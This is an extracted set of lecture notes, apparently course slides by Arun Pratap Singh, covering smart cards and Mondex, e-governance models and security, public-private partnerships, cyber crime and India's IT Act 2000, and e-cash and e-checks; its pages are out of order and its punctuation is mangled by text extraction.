Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
